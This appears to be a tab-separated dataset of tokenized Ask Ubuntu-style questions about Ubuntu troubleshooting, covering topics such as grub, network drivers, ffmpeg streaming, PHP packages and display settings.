419351	how can evolution mail be made to default automatically to one contact list ?	since installing evolution 3.2.3 on ubuntu 12.04 it seems i must select ( the only existing ) mailing list every time i create a new mail before i can pick my recipients from it . this was not the case hitherto , a default mail list was immediately available . is it possible to define a default list any more ? ubuntu 12.04 evolution 3.2.3
419353	how does the system know where to reinstall grub ?	when grub is upgraded , or a do-release-upgrade is performed , how does ubuntu know where to reinstall grub ? grub could be in the mbr or at the beginning of a partition , but i ca n't find where this information is written on a running system .
419356	how to 2 hdd dual boot with truecrypt-encrypted windows disk and grub boot loader	imho , mine is a special case of the ubiquitous `` dual boot ubuntu and windows with separate hard drives '' case . in my laptop , i 've moved the existing `` master hard drive '' with win 7 on it to the cd-r slot ( via a special tray ) , left it as was , installed an ssd in the main hdd slot , installed ubuntu on it . all works fine , apart from the fact that grub does n't show up at startup , so i 'll have to boot the windows disk via f10 ( or f12 ? ) from the bios `` boot loader '' which i tend to forget to press . i 'm guessing this might be to do with the fact that i have encrypted the whole windows drive with truecrypt , so grub will not be able to actually `` see '' that there 's a windows installation on the secondary drive . can anyone please recommend a solution for this ? i guess what i would be after was a customized grub config ...
419358	how to get qemu binaries for mips	i am a new user for qemu . i successfully compiled for my system ( x64 ) but when i tried to compile it for mips it generate error that why i think that is there any way to get already compiled binary files . is there any way ( sites ) to get binaries for qemu for mips 32 or 64 or can i generate binaries for mips from my x64 system ?
419362	skype incoming call notification does n't work	! [ enter image description here ] [ 1 ] i 'm using ubuntu 13.10 and the skype incoming call notification does n't work . skype works perfectly , but when there is an incoming call i hear nothing , which is very annoying . i also followed the advice i found on this post skype not making incoming call sound , i tried to raise the volume of ubuntu 's notifications sound settings , but i only hear a very strong static sound and when i try to test the incoming call sound in skype it still does n't work . the skype incoming call is set on enabled in skype/options/notifications and can not be modified , but when i test the sound i hear nothing .
419364	tcp 5454 and 554 connection refused for rtsp streming via ffmpeg	i am trying to convert my rtmp streaming to rtsp streaming using ffmpeg . the following code is doing the convert `ffmpeg -i rtmp : //xxxxx.com/live/live1 -f rtsp rtsp : //xxxxx.com:5454/test1-rtsp.mpg` after running above command it 's return the following console . and i am getting connection refused for rtsp 5454 and aslo 554 . how can i solve this ? ffmpeg version n-60489-g03911c4 copyright ( c ) 2000-2014 the ffmpeg developers built on feb 10 2014 05:44:38 with gcc 4.6 ( debian 4.6.3-1 ) configuration : -- prefix=/root/ffmpeg-static/64bit -- extra-cflags='-i/root/ffmpeg-static/64bit/include -static ' -- extra-ldflags='-l/root/ffmpeg-static/64bit/lib -static ' -- extra-libs='-lxml2 -lexpat -lfreetype ' -- enable-static -- disable-shared -- disable-ffserver -- disable-doc -- enable-bzlib -- enable-zlib -- enable-postproc -- enable-runtime-cpudetect -- enable-libx264 -- enable-gpl -- enable-libtheora -- enable-libvorbis -- enable-libmp3lame -- enable-gray -- enable-libass -- enable-libfreetype -- enable-libopenjpeg -- enable-libspeex -- enable-libvo-aacenc -- enable-libvo-amrwbenc -- enable-version3 -- enable-libvpx libavutil 52 . 63.101 / 52 . 63.101 libavcodec 55 . 50.100 / 55 . 50.100 libavformat 55 . 31.100 / 55 . 31.100 libavdevice 55 . 8.100 / 55 . 8.100 libavfilter 4 . 1.102 / 4 . 1.102 libswscale 2 . 5.101 / 2 . 5.101 libswresample 0 . 17.104 / 0 . 17.104 libpostproc 52 . 3.100 / 52 . 3.100 [ flv @ 0x40d1440 ] stream discovered after head already parsed input # 0 , flv , from 'rtmp : //xxxxx.com/jiljillive/live1 ' : metadata : videokeyframe_frequency : 5 avclevel : 31 videodevice : broadcast sc video filter keywords : audiochannels : 2 presetname : custom copyright : audioinputvolume : 100 creationdate : tue feb 11 08:47:50 2014 : author : audiodevice : microphone ( splitcam virtual au avcprofile : 66 title : description : rating : duration : n/a , start : 0.000000 , bitrate : 438 kb/s stream # 0:0 : video : h264 ( baseline ) , yuv420p ( tv ) , 320x240 [ sar 1:1 dar 4:3 ] , 307 kb/s , 25 fps , 25 tbr , 1k tbn , 50 tbc stream # 0:1 : audio : mp3 , 44100 hz , stereo , s16p , 131 kb/s stream # 0:2 : data : none [ tcp @ 0x40f9c60 ] connection to tcp : //emedias.com:5454 ? timeout=0 failed : connection refused output # 0 , rtsp , to 'rtsp : //xxxxxx.com:5454/test1-rtsp.mpg ' : metadata : videokeyframe_frequency : 5 avclevel : 31 videodevice : broadcast sc video filter keywords : audiochannels : 2 presetname : custom copyright : audioinputvolume : 100 creationdate : tue feb 11 08:47:50 2014 : author : audiodevice : microphone ( splitcam virtual au avcprofile : 66 title : description : rating : encoder : lavf55.31.100 stream # 0:0 : video : mpeg4 , yuv420p , 320x240 [ sar 1:1 dar 4:3 ] , q=2-31 , 200 kb/s , 90k tbn , 25 tbc stream # 0:1 : audio : aac ( libvo_aacenc ) , 44100 hz , stereo , s16 , 128 kb/s stream mapping : stream # 0:0 - > # 0:0 ( h264 - > mpeg4 ) stream # 0:1 - > # 0:1 ( mp3 - > libvo_aacenc ) could not write header for output file # 0 ( incorrect codec parameters ? ) : input/output error checking port is open using this command nmap localhost starting nmap 5.21 ( http : //nmap.org ) at 2014-02-11 10:40 utc nmap scan report for localhost ( 127.0.0.1 ) host is up ( 0.000011s latency ) . not shown : 993 closed ports port state service 21/tcp open ftp 22/tcp open ssh 80/tcp open http 1935/tcp open rtmp 3306/tcp open mysql 5080/tcp open unknown 9999/tcp open abyss nmap done : 1 ip address ( 1 host up ) scanned in 0.18 seconds
419370	installing a theme in the /usr/share/themes/ directory	i 'm trying to install this theme http : //www.omgubuntu.co.uk/2014/01/iris-flat-gtk-theme-for-linux in their readme they say that there are two methods of installing it ; either to the /usr/share/themes/ directory or in the .themes folder but then it would only be available for one user i was trying to do it with the /usr/share/themes/ way but after i put the theme there i ca n't find it neither on unity tweak nor on settings/appearance what am i missing ?
419373	unable to access certain websites on ubuntu ( facebook , google , twitter , etcs )	i have a dual-boot machine . the internet is perfectly fine when i use windows ; i can access all websites normally . however , when i change to ubuntu , i can no longer access facebook , twitter , youtube , etc . what is going on ? what should i do to get this fixed ? edit : my dns : 8.8.8.8 , 8.8.4.4 from ifconfig eth0 link encap : ethernet hwaddr 50:46:5d:3f : f5:09 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:2515 errors:0 dropped:0 overruns:0 frame:0 tx packets:2515 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:202999 ( 202.9 kb ) tx bytes:202999 ( 202.9 kb ) wlan0 link encap : ethernet hwaddr dc:85 : de : a4 : e4:7d inet addr:192.168.0.102 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :de85 : deff : fea4 : e47d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:11092 errors:0 dropped:0 overruns:0 frame:0 tx packets:9984 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:7149295 ( 7.1 mb ) tx bytes:1679041 ( 1.6 mb ) from ip addr 1 : lo : < loopback , up , lower_up > mtu 65536 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < no-carrier , broadcast , multicast , up > mtu 1500 qdisc pfifo_fast state down qlen 1000 link/ether 50:46:5d:3f : f5:09 brd ff : ff : ff : ff : ff : ff 3 : wlan0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc mq state up qlen 1000 link/ether dc:85 : de : a4 : e4:7d brd ff : ff : ff : ff : ff : ff inet 192.168.0.102/24 brd 192.168.0.255 scope global wlan0 valid_lft forever preferred_lft forever inet6 fe80 : :de85 : deff : fea4 : e47d/64 scope link valid_lft forever preferred_lft forever i can ping www.google.com ( 0 % lost ) , but when i tried to ping www.youtube.com , only forever loading happened here : ping www.youtube.com ( 46.82.174.68 ) 56 ( 84 ) bytes of data . when i run nm-tool | tail -n 8 : ipv4 settings : address : 192.168.0.102 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 192.168.0.1 please help me .
419374	sshfs : wrong permission on server	when i mount a remote directory that is on my server using sshfs and i create a file in that directory the permission are set not as i like . i use this command : sudo sshfs -o allow_other , uid=1000 , gid=1000 , umask=0 anton @ 192.168.1.80 : / /media/test here is the output of `` ls -l '' -rw-r -- r -- 1 anton users 0 feb 11 11:48 file_created_directly_on_the_server -- -- rw-r -- 1 anton users 0 feb 11 11:44 file_created_in_directory_mounted_with_sshfs where can i change the permission so that files that i create locally in the directory mounted with sshfs have the same permissions as files created directly on the server ? thanks anton
419377	ubuntu 12.04 lts fglrx upgrade	yesterday , did the usual updates , but on switch on this morning , found myself using unity 2d , with big icons on the launcher . read around on google and realised that fglrx driver , which was part of update , may be the problem . fglrxinfo gave error messages . tried re-installing fglrx but no difference . have now uninstalled fglrx using synaptic , expecting non-working system to result , but to my surprise my system is back to normal with working unity 3d . question therefore - is fglrx update broken ?
419379	unable to restart my network services	i can not restart my networking services by using the restart command . earlier it was working fine but today i created a lot of mess by giving ips removing and all . and now when i enter the restart command , it shows that the network is stopping , restarting & soon after it shows some errors and got stuck . below is the restart command which i entered ; sudo /etc/init.d/networking restart please help me on this . p.s : also tell me ; if i assign an ip using vi /etc/network/interfaces ; then do i have to use below line before assigning ip or dhcp ; auto eth0
419381	login/startup sound file help	i am newer to ubuntu and i am trying to slowly learn . i have been trying to activate and change my login sound but currently i still hear nothing . i did hear the login sound at a point and i think i messed it up when i changed the file . this is what i have done . i added a startup application with this command i pasted in , /usr/bin/canberra-gtk-play -- id= '' desktop-login '' -- description= '' gnome login sound '' . i then typed in gksu nautilus and went to /usr/share/sounds/ubuntu/stereo and i changed two files , desktop-login.ogg and system-startup.ogg , at least that is what i renamed them . i renamed the old desktop-login.ogg to system-startup.ogg , which i thought was that files original name in the same folder just to move it out of the way and keep the sound . i brought in a new .ogg file and renamed it desktop-login.ogg in hopes that the new file would take hold and play in the old files place upon startup/login . i currently get no sounds . can anyone find my error ? my first thoughts are that the name i made , system-startup.ogg , was not the original name .
419382	ubuntu server 12.04 wo n't boot after install	the installation of ubuntu server 12.04 on my pc was finished smoothly but when i try to boot it , the following message appears : reboot and select proper boot device ... this is the output after i run a boot info : http : //paste.ubuntu.com/6914342/ and after running the boot info script boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > no boot loader is installed in the mbr of /dev/sda . = > no boot loader is installed in the mbr of /dev/sdb . sda1 : __________________________________________________________________________ file system : linux_raid_member boot sector type : - boot sector info : sda2 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : sdb1 : __________________________________________________________________________ file system : linux_raid_member boot sector type : - boot sector info : sdb2 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/sda1 1 1,953,525,167 1,953,525,167 ee gpt guid partition table detected . partition start sector end sector # of sectors system /dev/sda1 2,048 7,813,119 7,811,072 raid partition ( linux ) /dev/sda2 7,813,120 1,953,523,711 1,945,710,592 efi system partition drive : sdb _____________________________________________________________________ disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 1 1,953,525,167 1,953,525,167 ee gpt guid partition table detected . partition start sector end sector # of sectors system /dev/sdb1 2,048 7,813,119 7,811,072 raid partition ( linux ) /dev/sdb2 7,813,120 1,953,523,711 1,945,710,592 efi system partition '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 8bcf74b5-7cbd-25a9-31c5-537344fcd5c0 linux_raid_member server:0 /dev/sda2 80d5941c-88e4-4ffc-bdf4-42cf53dbfee8 ext4 /dev/sdb1 8bcf74b5-7cbd-25a9-31c5-537344fcd5c0 linux_raid_member server:0 /dev/sdb2 677c215a-c736-44e6-a7f3-3026764fc715 ext4 /dev/sr0 iso9660 ubuntu 12.04.2 lts i386 ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) what should i do ?
419385	no ethernet and no wireless working	i tried to install ubuntu 12.04.4 lts on my new notebook but the installation failed saying stopping mount network filesystem . so i tried with linux mint 13 mate 64bit , and the installation succeeded , even if neither ethernet nor wireless connection was working during install . after installing everything is fine except that i neither have ethernet nor wireless connection at all . the network manager reports no network devices detected . specifications : acer aspire e-522- 65204g1tmnkk processor is a 4x amd a6-5200 apu radeon ( tm ) hd graphics , 4gb ram . the output of lspci -nn : 01:00.0 ethernet controller ( 0200 ) : atheros communications inc. device ( 1969:10a1 ] ( rev 13 ) 05:00.0 network controller ( 0280 ] : atheros communications inc. device ( 168c:0036 ] ( rev 01 ) any suggestion to fix this problem ? here i am with the results of the commands : - ifconfig : lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:28 errors:0 dropped:0 overruns:0 frame:0 tx packets:28 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1920 ( 1.9 kb ) tx bytes:1920 ( 1.9 kb ) sudo dhclient eth0 : can not find device `` eth0 '' update 12 february : i found the solution , both for the ethernet card and the wireless adapter , but the problem is that they do not work together . doing : '' download compat-drivers source code https : //www.kernel.org/pub/linux/kernel/projects/backports/2013/03/04/compat-drivers-2013-03-04-u.tar.bz2 extract the tarball and type the following commands on a terminal : cd [ path-to-extracted-driver ] ./scripts/driver-select alx make sudo make install reboot the system '' the ethernet connection worked well . but still no wireless . after that , i followed these suggestions for the wireless adapter : '' sudo apt-get install linux-headers-generic build-essential wget http : //www.orbit-lab.org/kernel/compat-wireless-3-stable/v3.6/compat-wireless-3.6.6-1-snpc.tar.bz2 tar xvf compat* cd compat-wireless-3.6.6-1-snpc sudo su ./scripts/driver-select ath9k make make install modprobe ath9k exit '' even if the last command `` modprobe ath9k '' did n't work , i rebooted and i had the wireless working but ... . no more ethernet again ! ! ! is there anybody who can tell me how to solve this ?
419388	problems installing on macbook	i have a macbook pro in which i created a ubuntu live cd on an external hard-drive . i completely removed mac osx from the hard-drive and just installed ubuntu . later realising that i had installed a 62-bit , which then lead to a whole range of issues . for example : 1 ) blank screen on boot-up - i 've uninstalled and re-installed the nvidia drivers 2 ) slow and crashes - crashes would happen when typing something inside the terminal 3 ) the `` windows '' or dialog boxes would become extremely blurry and would result in me having to re-start my machine my plan is to re-install a 32-bit ubuntu operating system , however , i have done this and created this onto the external hd . when loading on the mac , i press the `` alt '' key , but it just hangs.. it wo n't let me choose which drive to boot into . could anyone offer any suggestions to how i can remove the 64-bit o/s and install a 32bit ?
419391	automatic start fish shell in terminal window	i would like to have separate shortcut at my desktop just for the fish shell , having a command like that does not start a window with fish shell : gnome-terminal fish if there is no solution for gnome-terminal , there could be any other window terminal emulator ... . note : i do not want to set fish as my default shell !
419392	is kdepimlibs 4.12.44 package available now ?	i am using ubuntu 13.10 , linux version 3.11.0-15-generic ( buildd @ roseapple ) ( gcc version 4.8.1 ( ubuntu/linaro 4.8.1-10ubuntu8 ) ) . to build one of the application i need kdepimlibs5-dev 4.12.44 . but on apt-get upgrad it upgrades to 4.11.x . please help !
419393	connect crossover high res . monitor to intel hd graphics 4400	i tried to attach my external crossover monitor to my lenovo yoga 2 pro with help from this page on notebookcheck.com . my monitor seems to be able to display only 2560x1440 at 60.0 , xrandr shows this output : xrandr screen 0 : minimum 320 x 200 , current 3200 x 1800 , maximum 32767 x 32767 edp1 connected primary 3200x1800+0+0 ( normal left inverted right x axis y axis ) 293mm x 165mm 3200x1800 60.0*+ 48.0 2048x1536 60.0 ... dp1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected ( normal left inverted right x axis y axis ) 2560x1440 60.0 + that page on notebookcheck.com sais in german : xrandr shows the possible resolutios of your monitors . now enter cvt 2560 1440 30 that will generate the modeline `` 2560x1440_30.00 '' : # 2560x1440 29.94 hz ( cvt ) hsync : 43.95 khz ; pclk : 146.25 mhz 146.25 2560 2680 2944 3328 1440 1443 1448 1468 -hsync +vsync create the new resolution with xrandr -- newmode `` 2560x1440_30.00 '' 146.25 2560 2680 2944 3328 1440 1443 1448 1468 -hsync +vsync and add it with xrandr -- addmode hdmi1 `` 2560x1440_30.00 '' i tried that but the monitor doese n't work correct : first it seems to work , but when you close any window on it , a shadow of that window stays on the screen . after moving some windows around the scereen is full of artefacts i also tried 60hz but that was even worse
419396	/casper/vmlinuz : f ile not found	i get this error /capser/vmlinuz : file not found when i try to install ubuntu 12.04.4 lts using the iso file on my windows 7 pc . can someone help with a solution to this issue .
419398	dns fails intermittently in 13.10 after update	after update of the following packages : https : //gist.github.com/xgdgsc/d52ab6a05adafb152221 i get intermittent dns failure for less than 1 min every a few minutes . at the same time , other devices are fine connecting the net , so it is not the router ' s problem . and the mac os x on this macbook pro ( 2011 late with broadcom wireless ) is also fine without such problem . i tried downgrading linux-firmware but not working . what can i do to fix this ?
419399	log into ubuntu from my mac over vnc	ok . using ssl/ssh viewer and tapping in the ip address , i can fully screen share my mac mini which is upstairs , in fact , i 'm writing this question right now in the osx environment on my laptop screen running ubuntu 12.04 . easy . however i can not log into ubuntu from the mac - > go - > connect to server , tap in the ip address of the ubuntu laptop . i have enabled `` allow others to control your desktop '' in desktop sharing . i have also installed a vnc app called chicken of the vnc and disabled bonjour - it times out or tells me to enable sharing . surely it can not be that difficult to just connect to ubuntu ? i 've read some documentation about vnc and it goes on about using vnc and the opening line states : '' although vnc has some optional security features , you should not run vnc directly over an untrusted network like the internet . instead , you should set an ssh server up as discussed in the ssh guide and configure a vnc server that you can start in so-called once mode . '' i.e . it says absolutely nothing about vnc and instead sends you on a never-ending trail of ssh servers , port forwarding and rsa keys . about how derek wants to log into his windows machine at work . i want to plug in an ethernet cable into both machines and screen share via vnc . any ideas ? many thanks . ps ok just to add something . i can actually see the ubuntu laptop , and it gives me the ip address , but can not connect . interestingly , i can actually log into the ubuntu screen from the ubuntu laptop ! using the ssl/ssh viewer in ubuntu it logs into itself ( the screen reloads itself within itself ) but it works , but not when trying it on the mac .
419401	how to set canon c5235i printer to staple	how do you set the options to enable stapling when printing to a canon c5235i printer ? i tried looking at http : //localhost:631 but i ca n't see any option for this . i am using canon imagerunner c6800 foomatic/postscript ( recommended ) as the printer driver as the closest model i could find . there is apparently a driver from canon at http : //software.canon-europe.com/software/0044074.asp but when i attempt to install the .deb it says it is for amd64 and refuses to install it .
419404	ubuntu desktop on ps3	at the moment being i have xbmc installed on my dell xps 1647 , ubuntu 12.04 . i have tested the features and xbmc does everything i need . it has airplay ( for rooted android ) , a good remote control for android ( no necessity of visual ui - i have no monitor ) . now i 'd like to build a dedicated machine for xbmc . i considered multiple options ; intel nuc , ps3 with ubuntu+xbmc/openelec , mini pc , etc.. i also have the ps 3 media server installed on my pc and it works well as a 'nas ' server but i do n't see it fully accommodate my needs as xbmc does . i figured a rebuild of a ps 3 could do the job . now , as far as i 'm concerned it ai n't possible to format the stock hdd and reinstall an ubuntu standalone partition so i thought about replacing the native hdd with a new ssd with ubuntu . anyone know if that would be an option ? - to make a linux desktop pc out of a rebuild ps3 .
419406	the network is available but it wo n't turn on	i downloaded ubuntu 12.04 today and the first problem i noticed that there was no internet connection i use a wired connection , so i opened the folder with the name ( networks ) and i chose ( wired ) and found that there was my network and next to it it was written ( off ) so i made it ( on ) but then it wo n't ( off ) again by itself and a pop up showed saying wired network disconnected so can any one tell me how to fix noticing that when i use windows vista on the same pc after it everything is just fine and the pc is connected eo the internet
419407	firefox print preview in ubuntu is different than windows	i need to check print preview using firefox in ubuntu . but the condition is , it should be equal to windows print preview which was shown by firefox . i have tried various paper size and zoom sizes but it does n't work for me . even i have installed ms font style also . its still showing different alignment . is there any way to fix this problem ?
419410	i am using lubuntu 12.04 . the wireless card does n't work	firstly , consider me stupid , a layman . i can follow instructions well and that 's about that . so far i have been following instructions for terminal command things . please tell me what the vertical lines are . eg : command1 || command2 the two lines that appear between command 1 and command 2 , what are they/how to i type them , if i do need to type them . and then : i have a hp pavilion ze4900 i have just installed lubuntu 12.04 ( if i had money i would buy something better , but i do n't ) i am trying really hard to get the wireless card to work . if you are able to give me step by step instructions on how to get it to work i would be really grateful .
419413	muon package manager and update manager problems	i am running kubuntu 13.10 , both the muon package manager and update managers tell me they ca n't download the packages , they both do this when i click on check for updates . they have done this intermittantly since the istall . this happens on both computers , the laptop is a toshiba satellite p75-a7200 core i7 and the desktop is an upgraded emachine amd dualcore 2.8 ghz .
419414	i ca n't update my system and play music or watch movies	i have a problem with my system i ca n't make updates and play music or watct films i even tried to make updates it say an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_universe_binary-amd64_packages , e : les listes de paquets ou le fichier « status » ne peuvent être analysés ou lus .
419415	kernel oops when updating grub.cfg ( mktemp )	i tried to update my kernel today , and i got a kernel oops . since it aborted the installation via apt-get , i can now reproduce it using sudo dpkg -- configure -a , see http : //pastebin.com/fves9ptw the kernel oops is as follows : http : //pastebin.com/m7yt4nea the failing process is mktemp with a null pointer dereference . any ideas ?
419418	problem with mahjongg in ubuntu 12.04	ok i have a problem with the game mahjongg . it 's the gnome version of the game that comes by default in ubuntu and other distros , but when i used the ricotz testing ppa aka the `` gnome shell '' ppa and updated my system mahjongg would no longer launch . i tried uninstalling and installing the package from synaptic , but i think i have to purge it and then install it . so it boils down to ; how do i purge and reinstall mahjongg from the terminal .
419419	how to create shortcut on ubuntu to open a terminal with some folder ?	i have a ubuntu running in vmware , and the folder is mnt/hgfs/somefolder ( shared folder from vmware ) . how can i create a shortcut to open a terminal with this path ( mnt/hgfs/somefolder ) without need to type everytime cd mnt/hgfs/somefolder ? on windows i use a file somefile.bat with this code : @ cd /d `` z : \somefolder\subfolder '' @ cmd.exe /k it is possible to add some arguments to open in root mode ?
419422	ubuntu one failed to sync after password change	i have changed my ubuntu one password and now my ubuntu one windows client fails to sync . is there any way to get the windows client to work again ?
419424	ca n't find openvswitch-brcompat on ubuntu 13.10	like title says ... and if i look into kernel modules i just find openvswitch.ko . i am on ubuntu 13.10 and i installed , openvswitch-controller openvswitch-switch openvswitch-datapath-source openvswitch-datapath-dkms when i try to install openvswitch-brcompat it just says it ca n't find any package named like that . any ideas ?
419427	apt-get does n't install latest php 5.4 from oldstable sources	i have two servers running 13.04 , and at some point i added the oldstable package sources for php 5.4 . for some reason i 'm not able to update it anymore though â one server does n't upgrade from 5.4.23 to 5.4.24 , and the other one , after a few troubleshooting uninstalls is stuck with 5.4.9 from the default package sources . here 's the correct version installed on one server : php 5.4.23-1+sury.org~raring+1 ( cli ) ( built : dec 12 2013 09:25:05 ) copyright ( c ) 1997-2013 the php group zend engine v2.4.0 , copyright ( c ) 1998-2013 zend technologies here 's what i did on the other server : # add-apt-repository ppa : ondrej/php5-oldstable # apt-get update & & apt-get upgrade but , i get the old version : # php -v php 5.4.9-4ubuntu2.4 ( cli ) ( built : dec 12 2013 04:29:20 ) copyright ( c ) 1997-2012 the php group zend engine v2.4.0 , copyright ( c ) 1998-2012 zend technologies i already did an apt-get remove php* -- purge , followed by an apt-get install php5 , but no dice : it brought me down from 5.4.23 to 5.4.9 . here 's the correct selections i need installed : # dpkg -- get-selections | grep php libapache2-mod-php5 install php-apc install php-pear install php5 install php5-cli install php5-common install php5-curl install php5-gd install php5-imagick install php5-mysql install the cache does n't even show the ppa : # apt-cache policy php5 php5 : installed : 5.4.9-4ubuntu2.4 candidate : 5.4.9-4ubuntu2.4 version table : *** 5.4.9-4ubuntu2.4 0 500 http : //eu-west-1.ec2.archive.ubuntu.com/ubuntu/ raring-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ raring-security/main amd64 packages 100 /var/lib/dpkg/status 5.4.9-4ubuntu2 0 500 http : //eu-west-1.ec2.archive.ubuntu.com/ubuntu/ raring/main amd64 packages
419428	'android sdk missing ' error when trying to install titanium	i 'm trying to install titanium on my ubuntu 13.10 . but i ca n't setup android sdk . it always show an error like an android sdk is missing . titanium requires android platform : 2.3.3 or above . i have already install this sdk version and the releated google apis . but it does n't work .
419430	i have installed vlc media player but audio is playing video screen is not showing in desktop	i have installed vlc media player but when video is clicked in only audio is played . no such vlc media player is shown in desktop only audio is hearing in it
419431	ubuntu 13.10 not booting , startpar bridge	i can not identify the reason for this , as i did n't change anything special . on booting , ubuntu is stuck in the loading screen . with f1 i get starting startpar bridge for notification of upstart job start/stop stopping startpar bridge for notification of upstart job start/stop multiple times . when i switch to command line i can log in , but i have no idea how to fix this issue there . network is not working then either , although the computer is connected via cable . maybe the network config is not loaded ( dhcp is off ) . so i can not run updates or reinstall . i tried all options in recovery mode . enable networking is not working . i can think of something like this : 1. enable networking 2. reinstall boot loader stuff ( grub , upload , ... )
419432	attributeerror : 'module ' object has no attribute	i am trying to get the depth map of two stereo images . i have taken the code from http : //docs.opencv.org/trunk/doc/py_tutorials/py_calib3d/py_depthmap/py_depthmap.html i get the following error : traceback ( most recent call last ) : file `` depth.py '' , line 9 , in < module > stereo = cv2.createstereobm ( numdisparities=16 , blocksize=15 ) attributeerror : 'module ' object has no attribute 'createstereobm' my code is : import numpy as np import cv2 from matplotlib import pyplot as plt imgl = cv2.imread ( 'tsukuba_l.png',0 ) imgr = cv2.imread ( 'tsukuba_r.png',0 ) stereo = cv2.createstereobm ( numdisparities=16 , blocksize=15 ) disparity = stereo.compute ( imgl , imgr ) plt.imshow ( disparity , 'gray ' ) plt.show ( ) i entered the python line interpreter , and wrote the following code : import cv2 help ( cv2 ) there is no function called 'createstereobm ' in cv2 . is the code wrong in the link provided at the top ? i am using python 2.7.3 in ubuntu 12.04 . is it possible that the code is meant for python 3 and above ? please help !
419433	courier-imap on 12.04 lts	how can i update my courier-imap on ubuntu 12.04 server ? currently iâ´m suffering from a charset bug , solved on 4.9.3 version . thanks .
419434	kubuntu : open application on specific monitor using bash script	i use two monitors and i want to write a bash script which opens applications on my second monitor ( thunderbird for example ) . i use conky which is also on my second monitor . i want to define the size of the application window so that conky is not covered up . i tried to use display=:0.0 or display=:0.1 but it seems that i just have like one monitor ( 0.0 ) . is there any way i can do that ? edit : i figured it out by myself . it is actually very easy with kde . you are able to set the position and behavior of each program with the kde window manager . it works now but i am still wondering how to put that in a script . after i set the window position with the window manager i just wrote a startup script , which starts the applications i want to use .
419438	searching for mails with two or more attachments - thunderbird	my problem : i need to find all mails with two or more attachments . and i need to do so maybe 20 times a day for more than 10000 mails . can i make thunderbird show the number of attachments a single mail has in inbox and not only if there is an attachment or not ? and if thunderbird is n't able to do so - is there any other ubuntu mail client that is ? or is there any other way - like making a filter that marks mails which have 2 or more attachments ?
419443	can not boot from usb compaq mini 110	i have a compaq mini 110 netbook with a broken hdd . i replaced the hdd and want to install ubuntu . the netbook does not have an optical drive so i have made a bootable usb . the problem is that when i select the usb to boot from bios i get a message to reboot and select a proper device or insert bootable media . does the hdd has to be formatted first ? any suggestions ? thanks is advance simos
419445	unable to start	so , i had some distorted boot screen , like inch gap from right and from top , ( the screen is slightly left , hope you got it , i can not update a image as i am on live cd ) . i 've followed this site and messed up with the frame-buffer.now my system is continuously restarting . tried to run the command via terminal but in live-cd it do n't work . please , please help !
419446	sync highlight pdf between ubuntu and android	i want to know if there is a way to synchronize a pdf with highlights between my ubuntu desktop and my android tablet . i know there are several ways to do it in mac , but i am not aware of one possibility in linux-ubuntu . thanks ! !
419451	ca n't get hdmi out working on lenovo g560	can i get dolby to my pc but no on hdmi out please ( our dts whatever ) on lenovo g560 xrandr : screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 32767 x 32767 lvds1 connected primary 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) lspci -v : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) subsystem : lenovo device 391e flags : bus master , fast devsel , latency 0 capabilities : < access denied > kernel driver in use : agpgart-intel 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) ( prog-if 00 [ vga controller ] ) subsystem : lenovo device 3920 flags : bus master , fast devsel , latency 0 , irq 41 memory at d0000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 5050 [ size=8 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) subsystem : lenovo device 38a5 flags : bus master , fast devsel , latency 0 , irq 43 